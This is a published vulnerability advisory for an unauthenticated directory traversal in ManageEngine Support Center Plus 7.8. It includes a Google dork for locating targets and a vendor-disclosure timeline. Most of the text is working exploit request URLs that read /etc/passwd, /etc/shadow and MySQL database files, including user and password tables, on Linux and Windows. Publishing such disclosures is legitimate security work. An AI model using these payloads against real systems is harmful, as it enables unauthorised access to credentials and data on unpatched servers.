Advisory:
ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal Vulnerability
Author:
Robert 'xistence' van Hamburg - xistence<AT>0x90.nl
Software link:
http://www.manageengine.com/products/support-center/download.html
Tested on:
Linux & Windows
Category:
Directory Traversal
Severity:
High
Google Dork: intitle:ManageEngine SupportCenter Plus
Description:
It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
This for example makes it possible to grab for the "/etc/shadow" file on a linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.
Requests Linux:
Grab the /etc/passwd & /etc/shadow:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=passwd&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=shadow&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&delete=false
In a default situation the databasename is "supportcenter" and so it's easy to retrieve the database files like this:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fibdata1&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile0&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile0&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile1&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaapassword.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaapassword.frm&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaauser.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaauser.frm&delete=false
Requests Windows:
MySQL database ibdata1 file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..\..\mysql\data\ibdata1&delete=false
Disclosure:
- May 30 2011, vulnerability found
- May 30 2011, contacted vendor (ManageEngine) about security issues
- Jun 1 2011, vulnerability fixed by vendor (ManageEngine) and released as patch 7803